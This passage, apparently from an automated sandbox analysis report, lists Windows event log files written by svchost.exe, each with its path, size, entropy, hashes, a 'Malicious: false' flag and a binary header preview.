SSDEEP:	768:50VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OaafcmafEMXW0OWkjWr:jcEt
MD5:	5166C2E32BD35C5E8D122799E53B4EA3
SHA1:	628619C0E31F8C29ED260FCC063CD27935ACC25C
SHA-256:	433A96E20784F1E6FB099FA4AB020EEA75BB22EEBC7D969497A31ABCB9B415AB
SHA-512:	E5EA93AA871264E180BBC67008D7AA1012CDCAC74D22D10B47F1849380E092DF2FD798C7143DD3CAB5D9192EB4A89BB0EE60DA662E626923551906AB8F31DFD9
Malicious:	false
Preview:	ElfChnk.........?...............?............y...{...v.......................................................................bV................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&.......>h..................................................%_..........................]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	78808
Entropy (8bit):	4.128394420006791
Encrypted:	false
SSDEEP:	384:ShNiGQ5XpvVRYBQf5pJiT5pwiT5yY4iT5pBiT5pDiHcbik5pKik5yY5Lbik5p9if:S1LpBVi7CPqmxVJEX
MD5:	7E147460AE44203D5277F84C41DACC45
SHA1:	28036301B4CDEBE6C63041C496C2259ED2F3E0BE
SHA-256:	F4D0F983D820C8F03047D00EAB05D9BE3A13ED33EB5D74003BBC8B274F426C88
SHA-512:	43A5368ADB6283D5D1E9505D6F709D628898EA361BAB48374CFE515B6EB6696DB715D949F49083608EE0A8E5D40DE2A40DAE6F2232EBC171F27DAFCCB65640AC
Malicious:	false
Preview:	ElfChnk.'.......,.......'.......,...........`+..`...T..........................................................................................X...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................1...............................................................&.......................................**......'...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.322146858454247
Encrypted:	false
SSDEEP:	384:NH6/hDGCyCkCzCRCFC5CdCbCHCQCrlC+C2CV2CfCrUCECZ/C/C/2a22j2EW2z2/5:NH6/d7kNrTgt
MD5:	D8DABE7AC7FE8F2D1CD853002971BB8A
SHA1:	AC6B0F9940C1B3DB1FBC58DE8A95DD252FA73A6A
SHA-256:	DDC0E74C04DFDB71841128067C33E0B5388CC5E93EEA1FDA4ADDFC6CA39FCC77
SHA-512:	A9AF55922FC793B10A17731BC7F83A70E741E695B47249993530612A11D0A41481068A4DFD4B07182F5604A4AE289211D00766B79DB67CC25171D4ECA5A9292A
Malicious:	false
Preview:	ElfChnk.U...............U...................`...h....fyC......................................................................K................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................F..............................&...............................................nw..............iq......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.475265357832672
Encrypted:	false
SSDEEP:	1536:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGDL+2ubu1ho7t8ckcXWIkFElThsk687vzGe:P1W7C3yZy0PwbjNIFTLyQV2qRR4jBGD+
MD5:	605D94FA0C65C59EECEECC2BEB2F61B5
SHA1:	28CA14F5E02A0A0348C4AC4A22BC228390B64F94
SHA-256:	4667182188A73611A09A2F2B7A5E623367634933BE49899E07ED2FFB99142381
SHA-512:	10CC31A6B3F5CC0AF090861E7EC615289DE4AB43E7B612F4F6518D6FEF8CD943E6A0F8A165AB4F6CAD5509575CC0C0D46960940799C95F1C6D6F103B4594EEA6
Malicious:	false
Preview:	ElfChnk.....................................0k...l..C.......................................................................2\x5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................6Y......................................**..............X.j[d.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.471207858391493
Encrypted:	false
SSDEEP:	1536:W/yzFyQWsk4cLSKph9YC/cmqbL9tKGjDLSGUpBpJyGBtpeNYyQ1y9MtRjzYC43sP:SyzFyNsk4cLSKph9YC/cmqb5tKGjDLSd
MD5:	40E805871A55E8ADAB346B2407360420
SHA1:	9B10A8FCF1CCAC78E3E5D2FA43418AC7061BAF75
SHA-256:	AABDC5806ECE52339311B55725E3D9F36FC3CA8388AC327757D67EA6E2C58564
SHA-512:	35653A15850C739FBB6CCA0ECC803CB0762BB403A879C1EADA8BF7223EC7DD332E1ADF8E79C7689D154CD78802B9C8F9F52C575CD4EEE6E5C9F2713AA00A182D
Malicious:	false
Preview:	ElfChnk.+.......[.......+.......[...........X]...^.........................................................................?.>.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F................................................................................................O.......8..&.......AR...6..12...............:......*......+.......^..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.517082344367377
Encrypted:	false
SSDEEP:	384:YjdAhA71d7587RS7a07DL7T7G7z7L7k7OXD7u7y7I717/7u7m727L07E7K72t7Rt:YBAiHEV6koTxbkeQEWi7Di
MD5:	2628D3458E9FBE638FC3A49E317866FA
SHA1:	8DB033ED373F8A837073679CE0F3B5DC1BD7085B
SHA-256:	D2B987B5AC61D1C66CACD6D0492AC4C4C316C9EE94638A0D312803BB9C24FD00
SHA-512:	6C3683E0A8CF261353830E1F2344A59428E55BBCAFE032AF52624FF961F28608C7E64134BBA4764DEB8885D384DFA593325DB889E9D752226FC29885E3520A67
Malicious:	false
Preview:	ElfChnk.....................................po..@q....`....................................................................\.$.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................e4.............../..s...........&................................................L..............e2......................**..H............<R.d.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.314954486903959
Encrypted:	false
SSDEEP:	384:5mhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauia:s6Ovc0S5UyEeDgLpIC4DoA4
MD5:	864CAA67E4BF2A335E088526FF347CD9
SHA1:	64E224001D864A18D4999F5D33A42C532877A361
SHA-256:	C904C319101B31E991343FC8FF2929F6841599C9DCC23AC6218272F630AD5894
SHA-512:	B899FA6CDC7D0F97BACCC9025516045878BBA58E86ADEA79AA164B3B27F00F6E52F8B8838210A3ECD0C0E6A20D9DD48A4A4754F7408C1DA5F1FDC2EE7A504231
Malicious:	false
Preview:	ElfChnk.........A...............A............u...v..........................................................................c.w.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................6f......w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.773262505715791
Encrypted:	false
SSDEEP:	384:bhGuZumutu4uEu5uOuDuyb2uPu1uVupUupu+R7udu4uEu1u0u8uhuluxuMuxuMuH:b/vI
MD5:	C06B3BF303EBDD17D76D87B596EE5407
SHA1:	BFC46338E3A89112D6D7E1CFF7A9FB5909DE6458
SHA-256:	26AB9FE5730119306B700304DF2B2C11C6E8322F29CAA9AD49CBBA968DD54CD9
SHA-512:	7CBD5FFB770669AC0295C6221E02D24C116F4B72E3D990F60D122B2AED3280075DA5C3DBCA8A5749F5E566920799087D1094ECB31B5937D8B78EFB40BEC0D0A2
Malicious:	false
Preview:	ElfChnk.........T...............T...........@........J......................................................................?..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................vN......................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2371167268838485
Encrypted:	false
SSDEEP:	384:RhiAeCv4A+yMrAmA1AHA6AbAMAEAFmANA49ALAEAyKiAfAFgAw+AqAFAApjANAil:RCCvudb6KinaWRQJ4+8nEPDh0
MD5:	3F2115642206C3D448781C58F4EE8AF3
SHA1:	1408F4FF05D6887F74B445E296BC9B69163EDDAE
SHA-256:	84EF0FE4C7A64FA8200DEE7E064A658C2BB94A262A6DBD1353CB7EE458DF1684
SHA-512:	C3B530EA9AC3FD03615D91457CB88474254CCC6B53B3737C932690059274ED18552F40836F7CF78B698A650D636A93B72EC8C8E8057921A28CAF3718D18C85CC
Malicious:	false
Preview:	ElfChnk.........................................@....a..........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................5.................................................... ..........&................................$......**..`..............;f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1631981097466806
Encrypted:	false
SSDEEP:	384:4hKpsdp90mp9b2p9iGp95ep94+p9/Kp9Wqp9tap98Cp9Pp96p9lp9za1p9Dp9Wpb:4cafg0Y
MD5:	CBAE5379AAAD2B6A84714F5CEA39ACFA
SHA1:	A1AC7C71917C9F27EDA9E17CF0CAD78FC07A82E5
SHA-256:	726B1343CDE4D4B7D2558B9B3E86DAD3782983304D0349974FFA7725D40A9D2B
SHA-512:	7A6DF8A6BDF99348719F7005EFD293089BDD9EB93E2801CB7F3F38C77717E1E47D496E7A1D8FA9FED8EC27D28946214B71C7B156A537B40112D4A76E38F968B8
Malicious:	false
Preview:	ElfChnk.........'...............'....................k......................................................................+N.>........................................<...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............E.yrf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.036288214996343
Encrypted:	false
SSDEEP:	384:vhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWB0:vwDoh1V00eB9iVsTBwMjO2
MD5:	80B64057A5C06D0016A06F2D493CF301
SHA1:	452FDD974A9D63E05AC2F9AE4199CFD0C7CDCD62
SHA-256:	5ABDEF24E5D651A400B36F57A109443BC4F1C975FDAEBB512ADE44935C8BEB1A
SHA-512:	4F9E119EDA7FEED0948DABBDE51C9CBD835DB19EE717F3ED6EB99A16240EB351C968F4A8C39E8BCA2124A0E8A1C53AE5CD8A7D7F61748AFDE0574FF675166F43
Malicious:	false
Preview:	ElfChnk.\...............\.......................X...j.......................................................................LU.t.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.166433348209963
Encrypted:	false
SSDEEP:	384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
MD5:	9AB3073B8BEBBC3C1E9DCB47217C8E27
SHA1:	33477618A675262EFDC74FACE70AE448EE9CAA05
SHA-256:	E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
SHA-512:	58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
Malicious:	false
Preview:	ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.534111714365454
Encrypted:	false
SSDEEP:	384:ThzMOYQNM6dM1MoYFMoYOKIKFKSKBKYKWKOKHxK/4KFKwKZKD4aKdKcKFKcKqKRk:T5sFcBKNL0
MD5:	0351C491B0F00BF50BFF2FACBC437BF7
SHA1:	C4EBBEC9DE4EEAC2BF3AECCA034F9D03641A9DB7
SHA-256:	431FCF2A6AB12F2DF26D4052A956F4CB7B1B4569647F0C53F516A0C00E4DF722
SHA-512:	B6241C7FCCBE68F99ED8FA54BF01930F3EBC329D6BC75CA2A7D3AFEFBBA462417C4030CACEF505AA5817DC2F400C6F9E815125698465307EBEE12AD87E5BF914
Malicious:	false
Preview:	ElfChnk..%.......%.......%.......%...........u...x...it#....................................................................}.4.........................................6...=...........................................................................................................................f...............?...........................m...................M...F........................H..................................u...............................................&......................................*..0....%.......t.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.17991581028056
Encrypted:	false
SSDEEP:	384:rhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmEUm:rY7L8
MD5:	29CF641A1656E6FFEC4DA85C7A079801
SHA1:	6A093C377E4E2A2349521BCB196B807002771743
SHA-256:	6CB6D3212C814BAA774E18560C973DF8348B01E9828CF9A70CCEDE9F41F91D91
SHA-512:	D7A3F33542175B9192DCD1A6FC09B01B0CB4FFFA2532032B76D03141C95F42E40D29882E921C751E112F7254FD6BC1C4F7C4FA1B7B84A8014A60AFE8831EAEC6
Malicious:	false
Preview:	ElfChnk......................................1..(4....T.......................................................................b................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.2041002701676904
Encrypted:	false
SSDEEP:	48:MqDVWd8NrP+8QNRBEZWTENO4brBE3ovp/6y:z54NVaO8ioR/6y
MD5:	BECFC11F7F0E9C8E94C62DC3A9774E67
SHA1:	FF160D83C9250889DC6AF6C681C4907080E11C2C
SHA-256:	A64D4374204D925F5D02DAF04A35D16341459C8745E94BA3CCE4D90EABEEAE7C
SHA-512:	3F595984F4E5E3663FB986803172B89C9E9EE671E0D1EB643C825D8FB0416D076AF5A3107E3A35AA803EF9876E6F45FBFFF5A0D5F5CDD6BD1E1C3A488B45523D
Malicious:	false
Preview:	ElfChnk...............................................Q......................................................................H.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**...............z..g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9658503180918458
Encrypted:	false
SSDEEP:	384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
MD5:	9961A2C4F5AC430AB4FE55D69904E2C9
SHA1:	BA49A1A12A889812148BECC8D5B285AD418D54FE
SHA-256:	EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
SHA-512:	B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
Malicious:	false
Preview:	ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.404493888114613
Encrypted:	false
SSDEEP:	768:B6aQLVaLaDaja/aOWaXabaXajaSOaDa/ararafaTafa/aLaPaHaLajaTavaHajaO:SLM0
MD5:	93CBE830C36294EE7C54531CAF3B20E2
SHA1:	9AE23F9A8FCDBAA196771E58A26331C4D8318FBE
SHA-256:	27304617C3334BB2E9492FDAC7376C33DEF42456CF11FB12CE596EEB9FB6BB87
SHA-512:	5C718F397A4086AB702CE198809214B295A7679B37D647219D90C3E78B54139864D8537F09446B4E11AEF73DAC20B61F14CF24C6D9205DB958F3E755B6318F52
Malicious:	false
Preview:	ElfChnk.........@...............@...............`...NF.0....................................................................]5.=................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...........o...f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3650161876414235
Encrypted:	false
SSDEEP:	384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
MD5:	346E087AE87A771402B2E38619AB7B71
SHA1:	4B7EFEA99E401A5E6C0D115E2B27C48778704C13
SHA-256:	82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
SHA-512:	63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
Malicious:	false
Preview:	ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.335318634068108
Encrypted:	false
SSDEEP:	384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
MD5:	3B31610BEABB5895A19C346C64C234C6
SHA1:	84316C06991A51AD91C247130B615F0E56CD4D01
SHA-256:	EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
SHA-512:	2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
Malicious:	false
Preview:	ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7112352075765392
Encrypted:	false
